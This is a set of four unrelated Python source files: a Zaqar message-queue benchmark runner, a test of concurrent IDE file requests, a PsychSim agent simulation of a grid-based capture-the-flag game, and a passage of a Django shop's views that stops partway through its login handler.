source | python |
|---|---|
conductor.py | # Copyright (c) 2014 Rackspace, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import json
import multiprocessing as mp
from zaqarclient.queues import client
from zaqar.bench import config
from zaqar.bench import consumer
from zaqar.bench import observer
from zaqar.bench import producer
CONF = config.conf
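# Pretty-print a single worker's stats block (sorted by key) for --verbose runs.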
def _print_verbose_stats(name, stats):
print(name.capitalize())
print('=' * len(name))
values = sorted(stats.items(), key=lambda v: v[0])
formatted_vals = ['{}: {:.1f}'.format(*v) for v in values]
print('\n'.join(formatted_vals))
print() # Blank line
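# Delete the benchmark queues left over from a previous run so each run starts clean.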
def _reset_queues():
cli = client.Client(CONF.server_url)
for i in range(CONF.num_queues):
# TODO(kgriffs): DRY up name generation so it is done
# in a helper, vs. being copy-pasted everywhere.
queue = cli.queue(CONF.queue_prefix + '-' + str(i))
queue.delete()
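# Entry point: optionally reset queues, fan out producer/consumer/observer worker
# processes, then merge the stats they push onto the shared queue and report them.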
def main():
CONF(project='zaqar', prog='zaqar-benchmark')
# NOTE(kgriffs): Reset queues since last time. We don't
# clean them up after the performance test, in case
# the user wants to examine the state of the system.
if not CONF.skip_queue_reset:
if CONF.verbose:
print('Resetting queues...')
_reset_queues()
downstream_queue = mp.Queue()
procs = [mp.Process(target=worker.run, args=(downstream_queue,))
for worker in [producer, consumer, observer]]
for each_proc in procs:
each_proc.start()
for each_proc in procs:
each_proc.join()
stats = {}
for each_proc in procs:
stats.update(downstream_queue.get_nowait())
if CONF.verbose:
print()
for name in ('producer', 'observer', 'consumer'):
stats_group = stats[name]
# Skip disabled workers
if not stats_group['duration_sec']:
continue
_print_verbose_stats(name, stats_group)
else:
stats['params'] = {
'producer': {
'processes': CONF.producer_processes,
'workers': CONF.producer_workers
},
'consumer': {
'processes': CONF.consumer_processes,
'workers': CONF.consumer_workers
},
'observer': {
'processes': CONF.observer_processes,
'workers': CONF.observer_workers
},
}
print(json.dumps(stats))
|
files.py | """
Tests file interactions.
"""
# External
import unittest
import threading
# Local
import util
import config
class FilesTests(unittest.TestCase):
_team = None
_projName = None
@classmethod
def setUpClass(cls):
# Log In
data = dict(username = config.username, password = config.password)
util.makeIDERequest(util.loginEndPoint, data)
token = util.getCurrentToken()
util.assertIsNotNone(token, "No token stored from server response")
# Get a team
resp = util.makeIDERequest('user/info')
teams = resp['teams']
util.assertGreaterThan(0, len(teams), "User must be in a team to test the IDE")
cls._team = teams[0]['id']
def setUp(self):
# Create a project
self._projName = 'FilesTests-' + util.idGenerator()
data = dict(team = self._team, project = self._projName)
util.makeIDERequest('proj/new', data)
def tearDown(self):
data = dict(team = self._team, project = self._projName)
util.makeIDERequest('proj/del', data)
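# Regression test: fire the file-tree, lint and log requests concurrently
# against the same project and check that none of them returns an error.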
def test_1058(self):
data = dict(team = self._team, project = self._projName, path = 'robot.py')
data['paths'] = [data['path']]
data['message'] = 'A dummy commit'
data['data'] = 'Some dummy content for a dummy commit'
# Generate some data so that the requests have something to do
util.makeIDERequest('file/put', data)
util.makeIDERequest('proj/commit', data)
def fileTreeRequest():
global fileTreeResult
data2 = dict(data)
data2['path'] = '.'
fileTreeResult = util.makeIDERequest('file/compat-tree', data2)
def lintRequest():
global lintResult
lintResult = util.makeIDERequest('file/lint', data)
# util.printDict(lintResult)
def logRequest():
global logResult
logResult = util.makeIDERequest('file/log', data)
# util.printDict(logResult)
threads = []
for req in [ fileTreeRequest, lintRequest, logRequest ]:
t = threading.Thread( target = req )
t.start()
threads.append(t)
for t in threads:
t.join()
util.raiseOnRequestError(fileTreeResult)
util.raiseOnRequestError(lintResult)
util.raiseOnRequestError(logResult)
if __name__ == '__main__':
unittest.main(buffer=True)
|
teamwork.py | # Team of agents that attempts to capture a flag without being caught by enemies
# Agents:
# Explorer - minimize distance between self and goal location
# Distractor - maximize distance between explorer and enemy (new)
# Enemy - minimize distance between self and explorer and distractor
# Base - deploy distractor when explorer in danger (new)
from __future__ import print_function
from psychsim.reward import *
from psychsim.pwl import *
from psychsim.action import *
from psychsim.world import *
from psychsim.agent import *
import pyglet
from pyglet.window import key
from threading import Thread
from time import time
import os
class Scenario:
def __init__(self,
MAP_SIZE_X=0,
MAP_SIZE_Y=0,
F_ACTORS=0,
F_START_LOC=[],
F_GOAL_LOC=[],
E_ACTORS=0,
E_START_LOC=[],
E_PATROL_RANGE=5,
D_ACTORS=0,
D_START_LOC=[],
BASE=[0.0, 0.0],
DISTRACTOR=[0.0, 0.0],
ENEMY=[0.0, 0.0, 0.0],
AGENT=[0.0, 0.0]):
self.MAP_SIZE_X = MAP_SIZE_X
self.MAP_SIZE_Y = MAP_SIZE_Y
self.F_ACTORS = F_ACTORS
self.F_START_LOC = F_START_LOC
self.F_GOAL_LOC = F_GOAL_LOC
self.E_ACTORS = E_ACTORS
self.E_START_LOC = E_START_LOC
self.E_PATROL_RANGE = E_PATROL_RANGE
self.D_ACTORS = D_ACTORS
self.D_START_LOC = D_START_LOC
self.BASE = BASE
self.DISTRACTOR = DISTRACTOR
self.ENEMY = ENEMY
self.AGENT = AGENT
self.world = World()
self.world.defineState(None, 'turns', int)
self.world.setState(None, 'turns', 0)
self.world.addTermination(makeTree({'if': thresholdRow(stateKey(None, 'turns'), 20),
True: True, False: False}))
self.create_friendly_agents()
self.create_enemy_agents()
self.create_distract_agents()
self.create_base()
self.paused = False
# Parallel action
# self.world.setOrder([set(self.world.agents.keys())])
# Sequential action
self.world.setOrder(list(self.world.agents.keys()))
def f_get_current_x(self, actor):
return self.world.getState(actor.name, 'x').domain()[0]
def f_get_current_y(self, actor):
return self.world.getState(actor.name, 'y').domain()[0]
def f_get_start_x(self, index):
return int((self.F_START_LOC[index]).split(",", 1)[0])
def f_get_start_y(self, index):
return int((self.F_START_LOC[index]).split(",", 1)[1])
def f_get_goal_x(self, index):
return int((self.F_GOAL_LOC[index]).split(",", 1)[0])
def f_get_goal_y(self, index):
return int((self.F_GOAL_LOC[index]).split(",", 1)[1])
def e_get_current_x(self, actor):
return self.world.getState(actor.name, 'x').domain()[0]
def e_get_current_y(self, actor):
return self.world.getState(actor.name, 'y').domain()[0]
def e_get_start_x(self, index):
return int((self.E_START_LOC[index]).split(",", 1)[0])
def e_get_start_y(self, index):
return int((self.E_START_LOC[index]).split(",", 1)[1])
def d_get_start_x(self, index):
return int((self.D_START_LOC[index]).split(",", 1)[0])
def d_get_start_y(self, index):
return int((self.D_START_LOC[index]).split(",", 1)[1])
def find_distance(self, start_x, start_y, goal_x, goal_y):
return abs(goal_x - start_x) + abs(goal_y - start_y)
def create_base(self):
for index in range(0, self.D_ACTORS):
base = Agent('Base' + str(index))
self.world.addAgent(base)
base.setHorizon(5)
self.world.defineState(base.name, 'x', int)
self.world.setState(base.name, 'x', 0)
self.world.defineState(base.name, 'y', int)
self.world.setState(base.name, 'y', 0)
# Deploy distractor
action = base.addAction({'verb': 'Deploy'})
tree = makeTree(setToConstantMatrix(stateKey('Distractor' + str(index), 'deployed'), True))
self.world.setDynamics(stateKey('Distractor' + str(index), 'deployed'), action, tree)
# Nop
action = base.addAction({'verb': 'Wait'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
base.setReward(
minimizeDifference(stateKey('Distractor' + str(index), 'x'), stateKey('Enemy' + str(index), 'x')),
self.BASE[0])
base.setReward(
minimizeDifference(stateKey('Distractor' + str(index), 'y'), stateKey('Enemy' + str(index), 'y')),
self.BASE[0])
base.setReward(minimizeFeature(stateKey('Distractor' + str(index), 'cost')), self.BASE[1])
def create_friendly_agents(self):
for index in range(0, self.F_ACTORS):
actor = Agent('Actor' + str(index))
self.world.addAgent(actor)
actor.setHorizon(5)
# Set agent's starting location
self.world.defineState(actor.name, 'x', int)
self.world.setState(actor.name, 'x', self.f_get_start_x(index))
self.world.defineState(actor.name, 'goal_x', int)
self.world.setState(actor.name, 'goal_x', self.f_get_goal_x(index))
self.world.defineState(actor.name, 'y', int)
self.world.setState(actor.name, 'y', self.f_get_start_y(index))
self.world.defineState(actor.name, 'goal_y', int)
self.world.setState(actor.name, 'goal_y', self.f_get_goal_y(index))
# Positive reward for going towards goal
actor.setReward(minimizeDifference(stateKey(actor.name, 'x'), stateKey(actor.name, 'goal_x')),
self.AGENT[0])
actor.setReward(minimizeDifference(stateKey(actor.name, 'y'), stateKey(actor.name, 'goal_y')),
self.AGENT[0])
# Negative reward for going towards enemy
enemy = 'Enemy' + str(index)
actor.setReward(minimizeDifference(stateKey(actor.name, 'x'), stateKey(enemy, 'x')), self.AGENT[1])
actor.setReward(minimizeDifference(stateKey(actor.name, 'y'), stateKey(enemy, 'y')), self.AGENT[1])
self.set_friendly_actions(actor)
# Terminate if agent reaches goal
tree = makeTree({'if': equalFeatureRow(stateKey(actor.name, 'x'), stateKey(actor.name, 'goal_x')),
True: {'if': equalFeatureRow(stateKey(actor.name, 'y'), stateKey(actor.name, 'goal_y')),
True: True,
False: False},
False: False})
self.world.addTermination(tree)
def set_friendly_actions(self, actor):
# Nop
action = actor.addAction({'verb': 'Wait'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Increment X position
action = actor.addAction({'verb': 'MoveRight'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics('turns', action, tree)
# Rightmost boundary check
tree = makeTree({'if': equalRow(stateKey(actor.name, 'x'), str(self.MAP_SIZE_X)),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Decrement X position
action = actor.addAction({'verb': 'MoveLeft'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Leftmost boundary check, min X = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'x'), '0'),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Increment Y position
action = actor.addAction({'verb': 'MoveUp'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Topmost boundary check, max Y
tree = makeTree({'if': equalRow(stateKey(actor.name, 'y'), self.MAP_SIZE_Y - 1),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Decrement Y position
action = actor.addAction({'verb': 'MoveDown'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Bottom boundary check, min Y = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'y'), '0'),
True: False, False: True})
actor.setLegal(action, tree)
def create_distract_agents(self):
for index in range(0, self.D_ACTORS):
actor = Agent('Distractor' + str(index))
self.world.addAgent(actor)
actor.setHorizon(5)
# Agent is not allowed to move if not deployed by the base
self.world.defineState(actor.name, 'deployed', bool)
self.world.setState(actor.name, 'deployed', False)
# Every time the agent makes an action, there is a cost associated
self.world.defineState(actor.name, 'cost', int)
self.world.setState(actor.name, 'cost', 0)
# Set agent's starting location
self.world.defineState(actor.name, 'x', int)
self.world.setState(actor.name, 'x', 0)
self.world.defineState(actor.name, 'y', int)
self.world.setState(actor.name, 'y', 0)
# Positive reward for luring enemy away from Agents
actor.setReward(
minimizeDifference(stateKey('Actor' + str(index), 'x'), stateKey('Enemy' + str(index), 'x')),
self.DISTRACTOR[0])
actor.setReward(
minimizeDifference(stateKey('Actor' + str(index), 'y'), stateKey('Enemy' + str(index), 'y')),
self.DISTRACTOR[0])
# Positive reward for moving closer to enemy
actor.setReward(
minimizeDifference(stateKey('Distractor' + str(index), 'x'), stateKey('Enemy' + str(index), 'x')),
self.DISTRACTOR[1])
actor.setReward(
minimizeDifference(stateKey('Distractor' + str(index), 'y'), stateKey('Enemy' + str(index), 'y')),
self.DISTRACTOR[1])
self.set_distract_actions(actor)
def set_distract_actions(self, actor):
# Nop
action = actor.addAction({'verb': 'Wait'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
# Reward for not moving
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'cost'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'cost'), action, tree)
# Increment X position
action = actor.addAction({'verb': 'MoveRight'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
# Cost for moving
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'cost'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'cost'), action, tree)
# Rightmost boundary check
tree = makeTree({'if': equalRow(stateKey(actor.name, 'deployed'), True),
True: {'if': equalRow(stateKey(actor.name, 'x'), str(self.MAP_SIZE_X)),
True: False, False: True}, False: False})
actor.setLegal(action, tree)
##############################
# Decrement X position
action = actor.addAction({'verb': 'MoveLeft'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
# Cost for moving
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'cost'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'cost'), action, tree)
# Leftmost boundary check, min X = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'deployed'), True),
True: {'if': equalRow(stateKey(actor.name, 'x'), 0),
True: False, False: True}, False: False})
actor.setLegal(action, tree)
##############################
# Increment Y position
action = actor.addAction({'verb': 'MoveUp'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
# Cost for moving
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'cost'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'cost'), action, tree)
# Topmost boundary check, max Y
tree = makeTree({'if': equalRow(stateKey(actor.name, 'deployed'), True),
True: {'if': equalRow(stateKey(actor.name, 'y'), str(self.MAP_SIZE_Y)),
True: False, False: True}, False: False})
actor.setLegal(action, tree)
##############################
# Decrement Y position
action = actor.addAction({'verb': 'MoveDown'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
# Cost for moving
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'cost'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'cost'), action, tree)
# Bottom boundary check, min Y = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'deployed'), True),
True: {'if': equalRow(stateKey(actor.name, 'y'), 0),
True: False, False: True}, False: False})
actor.setLegal(action, tree)
def create_enemy_agents(self):
for index in range(0, self.E_ACTORS):
actor = Agent('Enemy' + str(index))
self.world.addAgent(actor)
actor.setHorizon(5)
# Set agent's starting location
self.world.defineState(actor.name, 'x', int)
self.world.setState(actor.name, 'x', self.e_get_start_x(index))
self.world.defineState(actor.name, 'y', int)
self.world.setState(actor.name, 'y', self.e_get_start_y(index))
enemy = 'Actor' + str(index)
actor.setReward(minimizeDifference(stateKey(actor.name, 'x'), stateKey(enemy, 'x')), self.ENEMY[0])
actor.setReward(minimizeDifference(stateKey(actor.name, 'y'), stateKey(enemy, 'y')), self.ENEMY[0])
actor.setReward(minimizeDifference(stateKey(actor.name, 'x'), stateKey('Distractor' + str(index), 'x')),
self.ENEMY[1])
actor.setReward(minimizeDifference(stateKey(actor.name, 'y'), stateKey('Distractor' + str(index), 'y')),
self.ENEMY[1])
# actor.setReward(minimizeDifference(stateKey(enemy, 'x'), stateKey(enemy, 'goal_x')), self.ENEMY[2])
# actor.setReward(minimizeDifference(stateKey(enemy, 'y'), stateKey(enemy, 'goal_y')), self.ENEMY[2])
self.set_enemy_actions(actor, index)
# Terminate if enemy captures agent
tree = {'if': equalFeatureRow(stateKey(actor.name, 'x'), stateKey('Actor' + str(index), 'x')),
True: {'if': equalFeatureRow(stateKey(actor.name, 'y'), stateKey('Actor' + str(index), 'y')),
True: True, False: False},
False: False}
self.world.addTermination(makeTree(tree))
def set_enemy_actions(self, actor, index):
# Nop
action = actor.addAction({'verb': 'Wait'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Increment X position
action = actor.addAction({'verb': 'MoveRight'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics('turns', action, tree)
# Rightmost boundary check
tree = makeTree({'if': equalRow(stateKey(actor.name, 'x'), str(self.MAP_SIZE_X)),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Decrement X position
action = actor.addAction({'verb': 'MoveLeft'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Leftmost boundary check, min X = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'x'), '0'),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Increment Y position
action = actor.addAction({'verb': 'MoveUp'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Topmost boundary check, max Y
tree = makeTree({'if': equalRow(stateKey(actor.name, 'y'), self.MAP_SIZE_Y - 1),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Decrement Y position
action = actor.addAction({'verb': 'MoveDown'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Bottom boundary check, min Y = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'y'), '0'),
True: False, False: True})
actor.setLegal(action, tree)
def evaluate_score(self):
cwd = os.getcwd()
print(cwd)
t = str(time())
file = open(os.path.join(cwd, "output", t + ".txt"), "w")
file.write("Parameters:\n")
file.write("Map Size X: " + str(self.MAP_SIZE_X) + "\n")
file.write("Map Size Y: " + str(self.MAP_SIZE_Y) + "\n")
file.write("Soldiers: " + str(self.F_ACTORS) + "\n")
file.write("Soldier Start Locations: " + str(self.F_START_LOC) + "\n")
file.write("Soldier Goal Locations: " + str(self.F_GOAL_LOC) + "\n")
file.write("Enemies: " + str(self.E_ACTORS) + "\n")
file.write("Enemy Start Locations: " + str(self.E_START_LOC) + "\n")
file.write("Bases/Helicopters: " + str(self.D_ACTORS) + "\n")
file.write("Base/Helicopter Start Locations: " + str(self.D_START_LOC) + "\n")
file.write("\n \n")
file.write("Weights:\n")
file.write("Soldier:\n")
file.write("Minimizing soldier and goal distance: " + str(self.AGENT[0]) + "\n")
file.write("Minimizing soldier and enemy distance: " + str(self.AGENT[1]) + "\n")
file.write("Enemy:\n")
file.write("Minimizing soldier and enemy distance: " + str(self.ENEMY[0]) + "\n")
file.write("Minimizing soldier and helicopter distance: " + str(self.ENEMY[1]) + "\n")
file.write("Minimizing soldier and goal distance: " + str(self.ENEMY[2]) + "\n")
file.write("Base:\n")
file.write("Minimizing helicopter and enemy distance: " + str(self.BASE[0]) + "\n")
file.write("Minimizing helicopter cost: " + str(self.BASE[1]) + "\n")
file.write("Helicopter:\n")
file.write("Minimizing helicopter and enemy distance: " + str(self.DISTRACTOR[0]) + "\n")
file.write("Minimizing soldier and enemy distance : " + str(self.DISTRACTOR[1]) + "\n")
file.write("\n \n")
file.write("Scores:\n")
file.write("Soldier-Goal Manhattan Distance: \n")
agent_goal_scores = []
for index in range(0, self.F_ACTORS):
ending_x = int(self.world.getState('Actor' + str(index), 'x').domain()[0])
ending_y = int(self.world.getState('Actor' + str(index), 'y').domain()[0])
agent_goal_scores.append(abs(self.f_get_goal_x(index) - ending_x) + abs(
self.f_get_goal_y(index) - ending_y))
file.write("Soldier" + str(index) + ": " + str(agent_goal_scores[index]) + "\n")
# print(agent_goal_scores[index])
file.write("Soldier-Enemy Manhattan Distance: \n")
agent_enemy_scores = []
for index in range(0, self.F_ACTORS):
soldier_x = int(self.world.getState('Actor' + str(index), 'x').domain()[0])
soldier_y = int(self.world.getState('Actor' + str(index), 'y').domain()[0])
enemy_x = int(self.world.getState('Enemy' + str(index), 'x').domain()[0])
enemy_y = int(self.world.getState('Enemy' + str(index), 'y').domain()[0])
agent_enemy_scores.append(abs(soldier_x - enemy_x) + abs(
soldier_y - enemy_y))
file.write("Soldier" + str(index) + ": " + str(agent_enemy_scores[index]) + "\n")
if(agent_enemy_scores[index] == 0):
file.write("Soldier was captured, penalty awarded")
# print(agent_enemy_scores[index])
file.write("Helicopter Deployment Costs: \n")
helicopter_cost_scores =[]
for index in range(0, self.D_ACTORS):
helicopter_score = int(self.world.getState('Distractor'+str(index), 'cost').domain()[0])
helicopter_cost_scores.append(helicopter_score)
file.write("Distractor"+str(index)+": "+ str(helicopter_cost_scores[index])+"\n")
file.write("Turns Taken: \n")
turns = int(self.world.getState(None,'turns').domain()[0])
file.write(str(turns) + "\n")
if(turns < 10):
file.write("Bonus for taking less than 10 turns")
def run_without_visual(self):
while not self.world.terminated():
result = self.world.step()
self.world.explain(result, 2)
self.evaluate_score()
def run_with_visual(self):
pyglet.resource.path = ['./resources']
pyglet.resource.reindex()
SCREEN_WIDTH = self.MAP_SIZE_X * 32
SCREEN_HEIGHT = self.MAP_SIZE_Y * 32
window = pyglet.window.Window(resizable=True)
window.set_size(SCREEN_WIDTH, SCREEN_HEIGHT)
tile_image = pyglet.resource.image("grass.png")
tiles_batch = pyglet.graphics.Batch()
tiles = []
for y in range(0, self.MAP_SIZE_Y):
for x in range(0, self.MAP_SIZE_X):
tiles.append(pyglet.sprite.Sprite(
img=tile_image,
x=x * 32,
y=y * 32,
batch=tiles_batch)
)
goal_image = pyglet.resource.image("target.png")
goals_batch = pyglet.graphics.Batch()
goals = []
for index in range(0, len(self.F_GOAL_LOC)):
goals.append(pyglet.sprite.Sprite(
img=goal_image,
x=self.f_get_goal_x(index) * 32,
y=self.f_get_goal_y(index) * 32,
batch=goals_batch)
)
agent_image = pyglet.resource.image("soldier_blue.png")
agents_batch = pyglet.graphics.Batch()
agents = []
for index in range(0, self.F_ACTORS):
agents.append(pyglet.sprite.Sprite(
img=agent_image,
x=self.f_get_start_x(index) * 32,
y=self.f_get_start_y(index) * 32,
batch=agents_batch)
)
enemy_image = pyglet.resource.image("soldier_red.png")
enemies_batch = pyglet.graphics.Batch()
enemies = []
for index in range(0, self.E_ACTORS):
enemies.append(pyglet.sprite.Sprite(
img=enemy_image,
x=self.e_get_start_x(index) * 32,
y=self.e_get_start_y(index) * 32,
batch=enemies_batch)
)
distractor_image = pyglet.resource.image("heli.png")
base_image = pyglet.resource.image("base.png")
allies_batch = pyglet.graphics.Batch()
bases = []
distractors = []
for index in range(0, self.D_ACTORS):
bases.append(pyglet.sprite.Sprite(
img=base_image,
x=self.d_get_start_x(index) * 32,
y=self.d_get_start_y(index) * 32,
batch=allies_batch)
)
distractors.append(pyglet.sprite.Sprite(
img=distractor_image,
x=self.d_get_start_x(index) * 32,
y=self.d_get_start_y(index) * 32,
batch=allies_batch)
)
@window.event
def on_draw():
window.clear()
tiles_batch.draw()
goals_batch.draw()
agents_batch.draw()
enemies_batch.draw()
allies_batch.draw()
@window.event
def on_key_press(symbol, modifiers):
if symbol == key.P:
self.paused = True
print('Paused')
if symbol == key.U:
self.paused = False
print('Resumed')
def update(dt):
if not self.paused:
result = self.world.step()
self.world.explain(result, 2)
if self.world.terminated():
self.evaluate_score()
window.close()
for index in range(0, self.F_ACTORS):
agents[index].x = int(self.world.getState('Actor' + str(index), 'x').domain()[0]) * 32
agents[index].y = int(self.world.getState('Actor' + str(index), 'y').domain()[0]) * 32
for index in range(0, self.E_ACTORS):
enemies[index].x = int(self.world.getState('Enemy' + str(index), 'x').domain()[0]) * 32
enemies[index].y = int(self.world.getState('Enemy' + str(index), 'y').domain()[0]) * 32
for index in range(0, self.D_ACTORS):
distractors[index].x = int(self.world.getState('Distractor' + str(index), 'x').domain()[0]) * 32
distractors[index].y = int(self.world.getState('Distractor' + str(index), 'y').domain()[0]) * 32
pyglet.clock.schedule_interval(update, 0.1)
# pyglet.app.run()
Thread(target=pyglet.app.run).start()
# target=pyglet.app.run()
# if __name__ == '__main__':
#
# print('RUN COMPLETE!')
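# Example usage (illustrative only: the map size, start/goal locations and reward
# weights below are assumed values, not taken from the original experiments):
#
# if __name__ == '__main__':
#     scenario = Scenario(
#         MAP_SIZE_X=8, MAP_SIZE_Y=8,
#         F_ACTORS=1, F_START_LOC=["0,0"], F_GOAL_LOC=["7,7"],
#         E_ACTORS=1, E_START_LOC=["4,4"],
#         D_ACTORS=1, D_START_LOC=["0,7"],
#         BASE=[1.0, 0.1], DISTRACTOR=[1.0, 0.5],
#         ENEMY=[1.0, 0.5, 0.0], AGENT=[1.0, -1.0])
#     scenario.run_without_visual()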
|
views.py | from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from django.http import HttpResponse, HttpResponseRedirect, QueryDict
from django.core.serializers.json import DjangoJSONEncoder
from django.contrib.auth import authenticate, login, logout
from django.views.generic import View, TemplateView
from django.contrib.sessions.models import Session
from django.contrib.auth.models import User
from django.template.loader import render_to_string
from django.core.mail import send_mail
from maracay.backEnd import backStart, profileBackend, filterProducts, adminSite
from django.shortcuts import render
from django.core.cache import cache
from django.conf import settings
from threading import Thread
from maracay.models import Tools, Profile as ProfileDB, PurchaseConfirmation, TokenPassword
from maracay import get_client_ip, config
import json,random, string, datetime
from django.contrib import admin
# Create your views here.
#Main Class
class Maracay(TemplateView):
template_name = 'market/index.html'
#index
def get(self, request, *args, **kwargs):
_allproducts = backStart(request)
_allproducts.get()
if 'pagination' not in request.GET:
data = _allproducts.response_data
data['code'] = _allproducts.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 10 items per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
direction = '/static/images/upload/imagesp/'
return render(request, 'market/index.html',{'direction':direction,'contacts':contacts,'data':json.dumps(data['data'])})
'''else:
print ("22222")
data = _allproducts.response_data
data['code'] = _allproducts.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 25 contacts per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
return HttpResponse(json.dumps(dataAll, cls=DjangoJSONEncoder), content_type='application/json')'''
class Account(View):
def get(self, request, *args, **kwargs):
if str(request.user) != 'AnonymousUser':  # logged in: show the user's data
_accountData = profileBackend(request)
_accountData.accountData()
data = _accountData.response_data
return render(request, 'market/account.html', {'data':data['data']})
else:  # not logged in: show the registration form
return render(request, 'market/register.html', {})
class Login(View):
def __init__(self):
self.requireds = ['email', 'password', 'csrfmiddlewaretoken']
def post(self, request, *args, **kwargs):
# __ip = get_client_ip(request)
for key in self.requireds:
if not key in request.POST.keys():
return HttpResponse(status=400, content_type='application/json')
for session in Session.objects.filter(session_key=request.session.session_key):
if session:
# Cannot log in: the user already has an active session
return HttpResponse(json.dumps({'code':400,'message':'Ya tiene una sesión activa'}, cls=DjangoJSONEncoder), content_type='application/json')
# if cache.get('cache_ip__%s'%__ip):
# return HttpResponse(json.dumps({'code':400,'message':'Debe esperar 5 minutos'}, cls=DjangoJSONEncoder), content_type='application/json')
user = authenticate(username=request.POST['email'], password=request.POST['password'])
if user:
cache.clear()
login(request, user)
return HttpResponse(json.dumps({'code':200}, cls=DjangoJSONEncoder), content_type='application/json')
else:
return HttpResponse(json.dumps({'code':400,'message':'Intento fallido'}, cls=DjangoJSONEncoder), content_type='application/json')
#
# __cache_count_error = cache.get('cache_error__%s'%__ip)
# __cache_exist = cache.get('cache_ip__%s'%__ip)
# if __cache_exist:
